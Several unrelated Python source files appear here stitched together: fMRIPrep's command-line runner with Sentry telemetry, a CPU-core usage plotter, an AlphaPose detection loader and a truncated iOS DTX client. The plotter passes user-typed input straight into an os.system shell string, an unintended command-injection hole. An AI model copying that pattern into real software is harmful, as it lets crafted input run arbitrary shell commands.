'resolutions. If a path is given, the grid of that image will be used. '
'It determines the field of view and resolution of the output images, '
'but is not used in normalization.')
g_conf.add_argument(
'--medial-surface-nan', required=False, action='store_true', default=False,
help='Replace medial wall values with NaNs on functional GIFTI files. Only '
'performed for GIFTI files mapped to a freesurfer subject (fsaverage or fsnative).')
# ICA_AROMA options
g_aroma = parser.add_argument_group('Specific options for running ICA_AROMA')
g_aroma.add_argument('--use-aroma', action='store_true', default=False,
help='add ICA_AROMA to your preprocessing stream')
g_aroma.add_argument('--aroma-melodic-dimensionality', action='store',
default=-200, type=int,
help='Exact or maximum number of MELODIC components to estimate '
'(positive = exact, negative = maximum)')
# ANTs options
g_ants = parser.add_argument_group('Specific options for ANTs registrations')
g_ants.add_argument('--skull-strip-template', action='store', default='OASIS',
choices=['OASIS', 'NKI'],
help='select ANTs skull-stripping template (default: OASIS))')
g_ants.add_argument('--skull-strip-fixed-seed', action='store_true',
help='do not use a random seed for skull-stripping - will ensure '
'run-to-run replicability when used with --omp-nthreads 1')
# Fieldmap options
g_fmap = parser.add_argument_group('Specific options for handling fieldmaps')
g_fmap.add_argument('--fmap-bspline', action='store_true', default=False,
help='fit a B-Spline field using least-squares (experimental)')
g_fmap.add_argument('--fmap-no-demean', action='store_false', default=True,
help='do not remove median (within mask) from fieldmap')
# SyN-unwarp options
g_syn = parser.add_argument_group('Specific options for SyN distortion correction')
g_syn.add_argument('--use-syn-sdc', action='store_true', default=False,
help='EXPERIMENTAL: Use fieldmap-free distortion correction')
g_syn.add_argument('--force-syn', action='store_true', default=False,
help='EXPERIMENTAL/TEMPORARY: Use SyN correction in addition to '
'fieldmap correction, if available')
# FreeSurfer options
g_fs = parser.add_argument_group('Specific options for FreeSurfer preprocessing')
g_fs.add_argument(
'--fs-license-file', metavar='PATH', type=os.path.abspath,
help='Path to FreeSurfer license key file. Get it (for free) by registering'
' at https://surfer.nmr.mgh.harvard.edu/registration.html')
# Surface generation xor
g_surfs = parser.add_argument_group('Surface preprocessing options')
g_surfs.add_argument('--no-submm-recon', action='store_false', dest='hires',
help='disable sub-millimeter (hires) reconstruction')
g_surfs_xor = g_surfs.add_mutually_exclusive_group()
g_surfs_xor.add_argument('--cifti-output', action='store_true', default=False,
help='output BOLD files as CIFTI dtseries')
g_surfs_xor.add_argument('--fs-no-reconall', '--no-freesurfer',
action='store_false', dest='run_reconall',
help='disable FreeSurfer surface preprocessing.'
' Note : `--no-freesurfer` is deprecated and will be removed in 1.2.'
' Use `--fs-no-reconall` instead.')
g_other = parser.add_argument_group('Other options')
g_other.add_argument('-w', '--work-dir', action='store',
help='path where intermediate results should be stored')
g_other.add_argument(
'--resource-monitor', action='store_true', default=False,
help='enable Nipype\'s resource monitoring to keep track of memory and CPU usage')
g_other.add_argument(
'--reports-only', action='store_true', default=False,
help='only generate reports, don\'t run workflows. This will only rerun report '
'aggregation, not reportlet generation for specific nodes.')
g_other.add_argument(
'--run-uuid', action='store', default=None,
help='Specify UUID of previous run, to include error logs in report. '
'No effect without --reports-only.')
g_other.add_argument('--write-graph', action='store_true', default=False,
help='Write workflow graph.')
g_other.add_argument('--stop-on-first-crash', action='store_true', default=False,
help='Force stopping on first crash, even if a work directory'
' was specified.')
g_other.add_argument('--notrack', action='store_true', default=False,
help='Opt-out of sending tracking information of this run to '
'the FMRIPREP developers. This information helps to '
'improve FMRIPREP and provides an indicator of real '
'world usage crucial for obtaining funding.')
g_other.add_argument('--sloppy', action='store_true', default=False,
help='Use low-quality tools for speed - TESTING ONLY')
return parser
def main():
"""Entry point"""
from nipype import logging as nlogging
from multiprocessing import set_start_method, Process, Manager
from ..viz.reports import generate_reports
from ..utils.bids import write_derivative_description
set_start_method('forkserver')
warnings.showwarning = _warn_redirect
opts = get_parser().parse_args()
exec_env = os.name
# special variable set in the container
if os.getenv('IS_DOCKER_8395080871'):
exec_env = 'singularity'
if 'docker' in Path('/proc/1/cgroup').read_text():
exec_env = 'docker'
if os.getenv('DOCKER_VERSION_8395080871'):
exec_env = 'fmriprep-docker'
sentry_sdk = None
if not opts.notrack:
import sentry_sdk
from ..__about__ import __version__
environment = "prod"
release = __version__
if not __version__:
environment = "dev"
release = "dev"
elif bool(int(os.getenv('FMRIPREP_DEV', 0))) or ('+' in __version__):
environment = "dev"
def before_send(event, hints):
# Filtering log messages about crashed nodes
if 'logentry' in event and 'message' in event['logentry']:
msg = event['logentry']['message']
if msg.startswith("could not run node:"):
return None
elif msg.startswith("Saving crash info to "):
return None
elif re.match("Node .+ failed to run on host .+", msg):
return None
if 'breadcrumbs' in event and isinstance(event['breadcrumbs'], list):
fingerprints_to_propagate = ['no-disk-space', 'memory-error', 'permission-denied',
'keyboard-interrupt']
for bc in event['breadcrumbs']:
msg = bc.get('message', 'empty-msg')
if msg in fingerprints_to_propagate:
event['fingerprint'] = [msg]
break
return event
sentry_sdk.init("https://d5a16b0c38d84d1584dfc93b9fb1ade6@sentry.io/1137693",
release=release,
environment=environment,
before_send=before_send)
with sentry_sdk.configure_scope() as scope:
scope.set_tag('exec_env', exec_env)
if exec_env == 'fmriprep-docker':
scope.set_tag('docker_version', os.getenv('DOCKER_VERSION_8395080871'))
free_mem_at_start = round(psutil.virtual_memory().free / 1024**3, 1)
scope.set_tag('free_mem_at_start', free_mem_at_start)
scope.set_tag('cpu_count', cpu_count())
# Memory policy may have a large effect on types of errors experienced
overcommit_memory = Path('/proc/sys/vm/overcommit_memory')
if overcommit_memory.exists():
policy = {'0': 'heuristic',
'1': 'always',
'2': 'never'}.get(overcommit_memory.read_text().strip(), 'unknown')
scope.set_tag('overcommit_memory', policy)
if policy == 'never':
overcommit_kbytes = Path('/proc/sys/vm/overcommit_memory')
kb = overcommit_kbytes.read_text().strip()
if kb != '0':
limit = '{}kB'.format(kb)
else:
overcommit_ratio = Path('/proc/sys/vm/overcommit_ratio')
limit = '{}%'.format(overcommit_ratio.read_text().strip())
scope.set_tag('overcommit_limit', limit)
else:
scope.set_tag('overcommit_limit', 'n/a')
else:
scope.set_tag('overcommit_memory', 'n/a')
scope.set_tag('overcommit_limit', 'n/a')
for k, v in vars(opts).items():
scope.set_tag(k, v)
# Validate inputs
if not opts.skip_bids_validation:
print("Making sure the input data is BIDS compliant (warnings can be ignored in most "
"cases).")
validate_input_dir(exec_env, opts.bids_dir, opts.participant_label)
# FreeSurfer license
default_license = str(Path(os.getenv('FREESURFER_HOME')) / 'license.txt')
# Precedence: --fs-license-file, $FS_LICENSE, default_license
license_file = opts.fs_license_file or os.getenv('FS_LICENSE', default_license)
if not os.path.exists(license_file):
raise RuntimeError(
'ERROR: a valid license file is required for FreeSurfer to run. '
'FMRIPREP looked for an existing license file at several paths, in this '
'order: 1) command line argument ``--fs-license-file``; 2) ``$FS_LICENSE`` '
'environment variable; and 3) the ``$FREESURFER_HOME/license.txt`` path. '
'Get it (for free) by registering at https://'
'surfer.nmr.mgh.harvard.edu/registration.html')
os.environ['FS_LICENSE'] = license_file
# Retrieve logging level
log_level = int(max(25 - 5 * opts.verbose_count, logging.DEBUG))
# Set logging
logger.setLevel(log_level)
nlogging.getLogger('nipype.workflow').setLevel(log_level)
nlogging.getLogger('nipype.interface').setLevel(log_level)
nlogging.getLogger('nipype.utils').setLevel(log_level)
errno = 0
# Call build_workflow(opts, retval)
with Manager() as mgr:
retval = mgr.dict()
p = Process(target=build_workflow, args=(opts, retval))
p.start()
p.join()
if p.exitcode != 0:
sys.exit(p.exitcode)
fmriprep_wf = retval['workflow']
plugin_settings = retval['plugin_settings']
bids_dir = retval['bids_dir']
output_dir = retval['output_dir']
work_dir = retval['work_dir']
subject_list = retval['subject_list']
run_uuid = retval['run_uuid']
if not opts.notrack:
with sentry_sdk.configure_scope() as scope:
scope.set_tag('run_uuid', run_uuid)
scope.set_tag('npart', len(subject_list))
retcode = retval['return_code']
if fmriprep_wf is None:
sys.exit(1)
if opts.write_graph:
fmriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
if opts.reports_only:
sys.exit(int(retcode > 0))
if opts.boilerplate:
sys.exit(int(retcode > 0))
# Sentry tracking
if not opts.notrack:
sentry_sdk.add_breadcrumb(message='fMRIPrep started', level='info')
sentry_sdk.capture_message('fMRIPrep started', level='info')
# Check workflow for missing commands
missing = check_deps(fmriprep_wf)
if missing:
print("Cannot run fMRIPrep. Missing dependencies:")
for iface, cmd in missing:
print("\t{} (Interface: {})".format(cmd, iface))
sys.exit(2)
# Clean up master process before running workflow, which may create forks
gc.collect()
try:
fmriprep_wf.run(**plugin_settings)
except RuntimeError as e:
errno = 1
if "Workflow did not execute cleanly" not in str(e):
sentry_sdk.capture_exception(e)
raise
finally:
# Generate reports phase
errno += generate_reports(subject_list, output_dir, work_dir, run_uuid,
sentry_sdk=sentry_sdk)
write_derivative_description(bids_dir, str(Path(output_dir) / 'fmriprep'))
if not opts.notrack and errno == 0:
sentry_sdk.capture_message('fMRIPrep finished without errors', level='info')
sys.exit(int(errno > 0))
def validate_input_dir(exec_env, bids_dir, participant_label):
# Ignore issues and warnings that should not influence FMRIPREP
validator_config_dict = {
"ignore": [
"EVENTS_COLUMN_ONSET",
"EVENTS_COLUMN_DURATION",
"TSV_EQUAL_ROWS",
"TSV_EMPTY_CELL",
"TSV_IMPROPER_NA",
"VOLUME_COUNT_MISMATCH",
"BVAL_MULTIPLE_ROWS",
"BVEC_NUMBER_ROWS",
"DWI_MISSING_BVAL",
"INCONSISTENT_SUBJECTS",
"INCONSISTENT_PARAMETERS",
"BVEC_ROW_LENGTH",
"B_FILE",
"PARTICIPANT_ID_COLUMN",
"PARTICIPANT_ID_MISMATCH",
"TASK_NAME_MUST_DEFINE",
"PHENOTYPE_SUBJECTS_MISSING",
"STIMULUS_FILE_MISSING",
"DWI_MISSING_BVEC",
"EVENTS_TSV_MISSING",
"TSV_IMPROPER_NA",
"ACQTIME_FMT",
"Participants age 89 or higher",
"DATASET_DESCRIPTION_JSON_MISSING",
"FILENAME_COLUMN",
"WRONG_NEW_LINE",
"MISSING_TSV_COLUMN_CHANNELS",
"MISSING_TSV_COLUMN_IEEG_CHANNELS",
"MISSING_TSV_COLUMN_IEEG_ELECTRODES",
"UNUSED_STIMULUS",
"CHANNELS_COLUMN_SFREQ",
"CHANNELS_COLUMN_LOWCUT",
"CHANNELS_COLUMN_HIGHCUT",
"CHANNELS_COLUMN_NOTCH",
"CUSTOM_COLUMN_WITHOUT_DESCRIPTION",
"ACQTIME_FMT",
"SUSPICIOUSLY_LONG_EVENT_DESIGN",
"SUSPICIOUSLY_SHORT_EVENT_DESIGN",
"MALFORMED_BVEC",
"MALFORMED_BVAL",
"MISSING_TSV_COLUMN_EEG_ELECTRODES",
"MISSING_SESSION"
],
"error": ["NO_T1W"],
"ignoredFiles": ['/dataset_description.json', '/participants.tsv']
}
# Limit validation only to data from requested participants
if participant_label:
all_subs = set([os.path.basename(i)[4:] for i in glob(os.path.join(bids_dir,
"sub-*"))])
selected_subs = []
for selected_sub in participant_label:
if selected_sub.startswith("sub-"):
selected_subs.append(selected_sub[4:])
else:
selected_subs.append(selected_sub)
selected_subs = set(selected_subs)
bad_labels = selected_subs.difference(all_subs)
if bad_labels:
error_msg = 'Data for requested participant(s) label(s) not found. Could ' \
'not find data for participant(s): %s. Please verify the requested ' \
'participant labels.'
if exec_env == 'docker':
error_msg += ' This error can be caused by the input data not being ' \
'accessible inside the docker container. Please make sure all ' \
'volumes are mounted properly (see https://docs.docker.com/' \
'engine/reference/commandline/run/#mount-volume--v---read-only)'
if exec_env == 'singularity':
error_msg += ' This error can be caused by the input data not being ' \
'accessible inside the singularity container. Please make sure ' \
'all paths are mapped properly (see https://www.sylabs.io/' \
'guides/3.0/user-guide/bind_paths_and_mounts.html)'
raise RuntimeError(error_msg % ','.join(bad_labels))
ignored_subs = all_subs.difference(selected_subs)
if ignored_subs:
for sub in ignored_subs:
validator_config_dict["ignoredFiles"].append("/sub-%s/**" % sub)
with tempfile.NamedTemporaryFile('w+') as temp:
temp.write(json.dumps(validator_config_dict))
temp.flush()
try:
subprocess.check_call(['bids-validator', bids_dir, '-c', temp.name])
except FileNotFoundError:
logger.error("bids-validator does not appear to be installed")
def build_workflow(opts, retval):
"""
Create the Nipype Workflow that supports the whole execution
graph, given the inputs.
All the checks and the construction of the workflow are done
inside this function that has pickleable inputs and output
dictionary (``retval``) to allow isolation using a
``multiprocessing.Process`` that allows fmriprep to enforce
a hard-limited memory-scope.
"""
from subprocess import check_call, CalledProcessError, TimeoutExpired
from pkg_resources import resource_filename as pkgrf
from nipype import logging, config as ncfg
from ..__about__ import __version__
from ..workflows.base import init_fmriprep_wf
from ..utils.bids import collect_participants
from ..viz.reports import generate_reports
logger = logging.getLogger('nipype.workflow')
INIT_MSG = """
Running fMRIPREP version {version}:
* BIDS dataset path: {bids_dir}.
* Participant list: {subject_list}.
* Run identifier: {uuid}.
""".format
output_spaces = opts.output_space or []
# Validity of some inputs
# ERROR check if use_aroma was specified, but the correct template was not
if opts.use_aroma and (opts.template != 'MNI152NLin2009cAsym' or
'template' not in output_spaces):
output_spaces.append('template')
logger.warning(
'Option "--use-aroma" requires functional images to be resampled to MNI space. '
'The argument "template" has been automatically added to the list of output '
'spaces (option "--output-space").'
)
# Check output_space
if 'template' not in output_spaces and (opts.use_syn_sdc or opts.force_syn):
msg = ['SyN SDC correction requires T1 to MNI registration, but '
'"template" is not specified in "--output-space" arguments.',
'Option --use-syn will be cowardly dismissed.']
if opts.force_syn:
output_spaces.append('template')
msg[1] = (' Since --force-syn has been requested, "template" has been added to'
' the "--output-space" list.')
logger.warning(' '.join(msg))
# Set up some instrumental utilities
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid.uuid4())
# First check that bids_dir looks like a BIDS folder
bids_dir = os.path.abspath(opts.bids_dir)
subject_list = collect_participants(
bids_dir, participant_label=opts.participant_label)
# Load base plugin_settings from file if --use-plugin
if opts.use_plugin is not None:
from yaml import load as loadyml
with open(opts.use_plugin) as f:
plugin_settings = loadyml(f)
plugin_settings.setdefault('plugin_args', {})
else:
# Defaults
plugin_settings = {
'plugin': 'MultiProc',
'plugin_args': {
'raise_insufficient': False,
'maxtasksperchild': 1,
}
}
# Resource management options
# Note that we're making strong assumptions about valid plugin args
# This may need to be revisited if people try to use batch plugins
nthreads = plugin_settings['plugin_args'].get('n_procs')
# Permit overriding plugin config with specific CLI options
if nthreads is None or opts.nthreads is not None:
nthreads = opts.nthreads
if nthreads is None or nthreads < 1:
nthreads = cpu_count()
plugin_settings['plugin_args']['n_procs'] = nthreads
if opts.mem_mb:
plugin_settings['plugin_args']['memory_gb'] = opts.mem_mb / 1024
omp_nthreads = opts.omp_nthreads
if omp_nthreads == 0:
omp_nthreads = min(nthreads - 1 if nthreads > 1 else cpu_count(), 8)
if 1 < nthreads < omp_nthreads:
logger.warning(
'Per-process threads (--omp-nthreads=%d) exceed total '
'threads (--nthreads/--n_cpus=%d)', omp_nthreads, nthreads)
# Set up directories
output_dir = op.abspath(opts.output_dir)
log_dir = op.join(output_dir, 'fmriprep', 'logs')
work_dir = op.abspath(opts.work_dir or 'work') # Set work/ as default
# Check and create output and working directories
os.makedirs(output_dir, exist_ok=True)
os.makedirs(log_dir, exist_ok=True)
os.makedirs(work_dir, exist_ok=True)
# Nipype config (logs and execution)
ncfg.update_config({
'logging': {
'log_directory': log_dir,
'log_to_file': True
},
'execution': {
'crashdump_dir': log_dir,
'crashfile_format': 'txt',
'get_linked_libs': False,
'stop_on_first_crash': opts.stop_on_first_crash or opts.work_dir is None,
},
'monitoring': {
'enabled': opts.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
if opts.resource_monitor:
ncfg.enable_resource_monitor()
retval['return_code'] = 0
retval['plugin_settings'] = plugin_settings
retval['bids_dir'] = bids_dir
retval['output_dir'] = output_dir
retval['work_dir'] = work_dir
retval['subject_list'] = subject_list
retval['run_uuid'] = run_uuid
retval['workflow'] = None
# Called with reports only
if opts.reports_only:
logger.log(25, 'Running --reports-only on participants %s', ', '.join(subject_list))
if opts.run_uuid is not None:
run_uuid = opts.run_uuid
retval['return_code'] = generate_reports(subject_list, output_dir, work_dir, run_uuid)
return retval
# Build main workflow
logger.log(25, INIT_MSG(
version=__version__,
bids_dir=bids_dir,
subject_list=subject_list,
uuid=run_uuid)
)
template_out_grid = opts.template_resampling_grid
if opts.output_grid_reference is not None:
logger.warning(
'Option --output-grid-reference is deprecated, please use '
'--template-resampling-grid')
template_out_grid = template_out_grid or opts.output_grid_reference
if opts.debug:
logger.warning('Option --debug is deprecated and has no effect')
retval['workflow'] = init_fmriprep_wf(
subject_list=subject_list,
task_id=opts.task_id,
echo_idx=opts.echo_idx,
run_uuid=run_uuid,
ignore=opts.ignore,
debug=opts.sloppy,
low_mem=opts.low_mem,
anat_only=opts.anat_only,
longitudinal=opts.longitudinal,
t2s_coreg=opts.t2s_coreg,
omp_nthreads=omp_nthreads,
skull_strip_template=opts.skull_strip_template,
skull_strip_fixed_seed=opts.skull_strip_fixed_seed,
work_dir=work_dir,
output_dir=output_dir,
bids_dir=bids_dir,
freesurfer=opts.run_reconall,
output_spaces=output_spaces,
template=opts.template,
medial_surface_nan=opts.medial_surface_nan,
cifti_output=opts.cifti_output,
template_out_grid=template_out_grid,
hires=opts.hires,
use_bbr=opts.use_bbr,
bold2t1w_dof=opts.bold2t1w_dof,
fmap_bspline=opts.fmap_bspline,
fmap_demean=opts.fmap_no_demean,
use_syn=opts.use_syn_sdc,
force_syn=opts.force_syn,
use_aroma=opts.use_aroma,
aroma_melodic_dim=opts.aroma_melodic_dimensionality,
ignore_aroma_err=opts.ignore_aroma_denoising_errors,
)
retval['return_code'] = 0
logs_path = Path(output_dir) / 'fmriprep' / 'logs'
boilerplate = retval['workflow'].visit_desc()
(logs_path / 'CITATION.md').write_text(boilerplate)
logger.log(25, 'Works derived from this fMRIPrep execution should '
'include the following boilerplate:\n\n%s', boilerplate)
# Generate HTML file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('fmriprep', 'data/boilerplate.bib'),
'--filter', 'pandoc-citeproc',
str(logs_path / 'CITATION.md'),
'-o', str(logs_path / 'CITATION.html')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.html file:\n%s',
' '.join(cmd))
# Generate LaTex file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('fmriprep', 'data/boilerplate.bib'),
'--natbib', str(logs_path / 'CITATION.md'),
'-o', str(logs_path / 'CITATION.tex')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.tex file:\n%s',
' '.join(cmd))
return retval
if __name__ == '__main__':
raise RuntimeError("fmriprep/cli/run.py should not be run directly;\n"
"Please `pip install` fmriprep and use the `fmriprep` command")
|
demo1.py
|
from os import system
import threading
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime as dt
import time
global info
info = {}
def extract_data(pid,refreshRate):
system("top -H -p "+pid+" -d "+refreshRate+" -b | grep "+pid+" >> "+pid+refreshRate+".txt")
def process_data(pid,refreshRate):
global info
while (1):
f = open(pid+refreshRate+".txt")
data = f.readlines()
data = [i.strip() for i in data[:len(data)-1]]
time = [i.split()[-2] for i in data]
cores = [int(i.split()[-1]) for i in data]
df = {"cores":pd.Series(np.array(cores)),"time":pd.Series(np.array(time))}
df = pd.DataFrame(df)
freq_change = {}
start = df['time'][0]
for i in range(1,len(df)):
if df['cores'][i-1]!=df['cores'][i]:
freq_change[(start,df['time'][i])] = df['cores'][i-1]
start = df['time'][i]
start_time = [dt.strptime(i[0],"%M:%S.%f") for i in list(freq_change.keys())]
end_time = [dt.strptime(i[1],"%M:%S.%f") for i in list(freq_change.keys())]
deltas = [(end_time[i]-start_time[i]).microseconds for i in range(len(start_time))]
core_time = {"core":pd.Series(np.array(list(freq_change.values()))),"time":pd.Series(np.array(deltas))}
core_time = pd.DataFrame(core_time)
core_time.tail()
def to_milli(example):
return example/1000
core_time['time'] = core_time['time'].apply(to_milli)
print(core_time)
for i in range(4):
if i in info:
for j in range(len(core_time)):
if i==core_time['core'][j]:
info[i] += core_time['time'][j]
else:
info[i] = 0
for j in range(len(core_time)):
for i in range(4):
if i==core_time['core'][j]:
info[i] += core_time['time'][j]
print(info)
display_data(pid,refreshRate)
def display_data(pid,refreshRate):
global info
x = np.arange(len(info.keys()))
plt.bar(x, np.array(list(info.values())), color = 'blue')
plt.xlabel("Core IDs",fontsize=10)
plt.ylabel("Count in milliseconds",fontsize=10)
plt.draw()
plt.pause(0.1)
if __name__ == '__main__':
pid = input("Enter Process ID: ")
refreshRate = input("Enter Refresh Rate: ")
extract_thread = threading.Thread(target=extract_data, args = (pid,refreshRate))
display_thread = threading.Thread(target=process_data, args = (pid,refreshRate))
extract_thread.start()
time.sleep(4)
display_thread.start()
extract_thread.join()
display_thread.join()
print("DONE")
|
detector.py
|
import os
import sys
from threading import Thread
from queue import Queue
import cv2
import scipy.misc
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.presets import SimpleTransform
class DetectionLoader():
def __init__(self, input_source, detector, cfg, opt, mode='image', batchSize=1, queueSize=128):
self.cfg = cfg
self.opt = opt
self.mode = mode
self.device = opt.device
if mode == 'image':
self.img_dir = opt.inputpath
self.imglist = [os.path.join(self.img_dir, im_name.rstrip('\n').rstrip('\r')) for im_name in input_source]
self.datalen = len(input_source)
elif mode == 'video':
stream = cv2.VideoCapture(input_source)
assert stream.isOpened(), 'Cannot capture source'
self.path = input_source
self.datalen = int(stream.get(cv2.CAP_PROP_FRAME_COUNT))
self.fourcc = int(stream.get(cv2.CAP_PROP_FOURCC))
self.fps = stream.get(cv2.CAP_PROP_FPS)
self.frameSize = (int(stream.get(cv2.CAP_PROP_FRAME_WIDTH)), int(stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
self.videoinfo = {'fourcc': self.fourcc, 'fps': self.fps, 'frameSize': self.frameSize}
stream.release()
self.detector = detector
self.batchSize = batchSize
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
self._input_size = cfg.DATA_PRESET.IMAGE_SIZE
self._output_size = cfg.DATA_PRESET.HEATMAP_SIZE
self._sigma = cfg.DATA_PRESET.SIGMA
if cfg.DATA_PRESET.TYPE == 'simple':
self.transformation = SimpleTransform(
self, scale_factor=0,
input_size=self._input_size,
output_size=self._output_size,
rot=0, sigma=self._sigma,
train=False, add_dpg=False, gpu_device=self.device)
# initialize the queue used to store data
"""
image_queue: the buffer storing pre-processed images for object detection
det_queue: the buffer storing human detection results
pose_queue: the buffer storing post-processed cropped human image for pose estimation
"""
if opt.sp:
self._stopped = False
self.image_queue = Queue(maxsize=queueSize)
self.det_queue = Queue(maxsize=10 * queueSize)
self.pose_queue = Queue(maxsize=10 * queueSize)
else:
self._stopped = mp.Value('b', False)
self.image_queue = mp.Queue(maxsize=queueSize)
self.det_queue = mp.Queue(maxsize=10 * queueSize)
self.pose_queue = mp.Queue(maxsize=10 * queueSize)
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to pre process images for object detection
if self.mode == 'image':
image_preprocess_worker = self.start_worker(self.image_preprocess)
elif self.mode == 'video':
image_preprocess_worker = self.start_worker(self.frame_preprocess)
# start a thread to detect human in images
image_detection_worker = self.start_worker(self.image_detection)
# start a thread to post process cropped human image for pose estimation
image_postprocess_worker = self.start_worker(self.image_postprocess)
return [image_preprocess_worker, image_detection_worker, image_postprocess_worker]
def stop(self):
# clear queues
self.clear_queues()
def terminate(self):
if self.opt.sp:
self._stopped = True
else:
self._stopped.value = True
self.stop()
def clear_queues(self):
self.clear(self.image_queue)
self.clear(self.det_queue)
self.clear(self.pose_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def image_preprocess(self):
for i in range(self.num_batches):
imgs = []
orig_imgs = []
im_names = []
im_dim_list = []
for k in range(i * self.batchSize, min((i + 1) * self.batchSize, self.datalen)):
if self.stopped:
self.wait_and_put(self.image_queue, (None, None, None, None))
return
im_name_k = self.imglist[k]
# expected image shape like (1,3,h,w) or (3,h,w)
img_k = self.detector.image_preprocess(im_name_k)
if isinstance(img_k, np.ndarray):
img_k = torch.from_numpy(img_k)
# add one dimension at the front for batch if image shape (3,h,w)
if img_k.dim() == 3:
img_k = img_k.unsqueeze(0)
orig_img_k = scipy.misc.imread(im_name_k, mode='RGB')
im_dim_list_k = orig_img_k.shape[1], orig_img_k.shape[0]
imgs.append(img_k)
orig_imgs.append(orig_img_k)
im_names.append(im_name_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
imgs = torch.cat(imgs)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1, 2)
# im_dim_list_ = im_dim_list
self.wait_and_put(self.image_queue, (imgs, orig_imgs, im_names, im_dim_list))
def frame_preprocess(self):
stream = cv2.VideoCapture(self.path)
assert stream.isOpened(), 'Cannot capture source'
for i in range(self.num_batches):
imgs = []
orig_imgs = []
im_names = []
im_dim_list = []
for k in range(i * self.batchSize, min((i + 1) * self.batchSize, self.datalen)):
(grabbed, frame) = stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed or self.stopped:
# put the rest pre-processed data to the queue
if len(imgs) > 0:
with torch.no_grad():
# Record original image resolution
imgs = torch.cat(imgs)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1, 2)
self.wait_and_put(self.image_queue, (imgs, orig_imgs, im_names, im_dim_list))
self.wait_and_put(self.image_queue, (None, None, None, None))
print('===========================> This video get ' + str(k) + ' frames in total.')
sys.stdout.flush()
stream.release()
return
# expected frame shape like (1,3,h,w) or (3,h,w)
img_k = self.detector.image_preprocess(frame)
if isinstance(img_k, np.ndarray):
img_k = torch.from_numpy(img_k)
# add one dimension at the front for batch if image shape (3,h,w)
if img_k.dim() == 3:
img_k = img_k.unsqueeze(0)
im_dim_list_k = frame.shape[1], frame.shape[0]
imgs.append(img_k)
orig_imgs.append(frame[:, :, ::-1])
im_names.append(str(k) + '.jpg')
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Record original image resolution
imgs = torch.cat(imgs)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1, 2)
# im_dim_list_ = im_dim_list
self.wait_and_put(self.image_queue, (imgs, orig_imgs, im_names, im_dim_list))
stream.release()
def image_detection(self):
for i in range(self.num_batches):
imgs, orig_imgs, im_names, im_dim_list = self.wait_and_get(self.image_queue)
if imgs is None or self.stopped:
self.wait_and_put(self.det_queue, (None, None, None, None, None, None, None))
return
with torch.no_grad():
# pad useless images to fill a batch, else there will be a bug
for pad_i in range(self.batchSize - len(imgs)):
imgs = torch.cat((imgs, torch.unsqueeze(imgs[0], dim=0)), 0)
im_dim_list = torch.cat((im_dim_list, torch.unsqueeze(im_dim_list[0], dim=0)), 0)
dets = self.detector.images_detection(imgs, im_dim_list)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(orig_imgs)):
self.wait_and_put(self.det_queue, (orig_imgs[k], im_names[k], None, None, None, None, None))
continue
if isinstance(dets, np.ndarray):
dets = torch.from_numpy(dets)
dets = dets.cpu()
boxes = dets[:, 1:5]
scores = dets[:, 5:6]
if self.opt.tracking:
ids = dets[:, 6:7]
else:
ids = torch.zeros(scores.shape)
for k in range(len(orig_imgs)):
boxes_k = boxes[dets[:, 0] == k]
if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
self.wait_and_put(self.det_queue, (orig_imgs[k], im_names[k], None, None, None, None, None))
continue
inps = torch.zeros(boxes_k.size(0), 3, *self._input_size)
cropped_boxes = torch.zeros(boxes_k.size(0), 4)
self.wait_and_put(self.det_queue, (orig_imgs[k], im_names[k], boxes_k, scores[dets[:, 0] == k], ids[dets[:, 0] == k], inps, cropped_boxes))
def image_postprocess(self):
for i in range(self.datalen):
with torch.no_grad():
(orig_img, im_name, boxes, scores, ids, inps, cropped_boxes) = self.wait_and_get(self.det_queue)
if orig_img is None or self.stopped:
self.wait_and_put(self.pose_queue, (None, None, None, None, None, None, None))
return
if boxes is None or boxes.nelement() == 0:
self.wait_and_put(self.pose_queue, (None, orig_img, im_name, boxes, scores, ids, None))
continue
# imght = orig_img.shape[0]
# imgwidth = orig_img.shape[1]
for i, box in enumerate(boxes):
inps[i], cropped_box = self.transformation.test_transform(orig_img, box)
cropped_boxes[i] = torch.FloatTensor(cropped_box)
# inps, cropped_boxes = self.transformation.align_transform(orig_img, boxes)
self.wait_and_put(self.pose_queue, (inps, orig_img, im_name, boxes, scores, ids, cropped_boxes))
def read(self):
return self.wait_and_get(self.pose_queue)
@property
def stopped(self):
if self.opt.sp:
return self._stopped
else:
return self._stopped.value
@property
def length(self):
return self.datalen
@property
def joint_pairs(self):
"""Joint pairs which defines the pairs of joint to be swapped
when the image is flipped horizontally."""
return [[1, 2], [3, 4], [5, 6], [7, 8],
[9, 10], [11, 12], [13, 14], [15, 16]]
|
dvt.py
|
import enum
import queue
import typing
from collections import defaultdict
from threading import Thread, Event
from ..util import logging, Log
from ..util.dtx_msg import DTXMessage, MessageAux, dtx_message_header, object_to_aux
from ..util.exceptions import MuxError
from ..util.variables import LOG
log = Log.getLogger(LOG.Instrument.value)
class DTXEnum(str, enum.Enum):
FINISHED = "finished:"
class DTXClient:
def __init__(self):
self._dtx_manager = {}
def recv(self, client, length) -> bytes:
buf = bytearray()
while len(buf) < length:
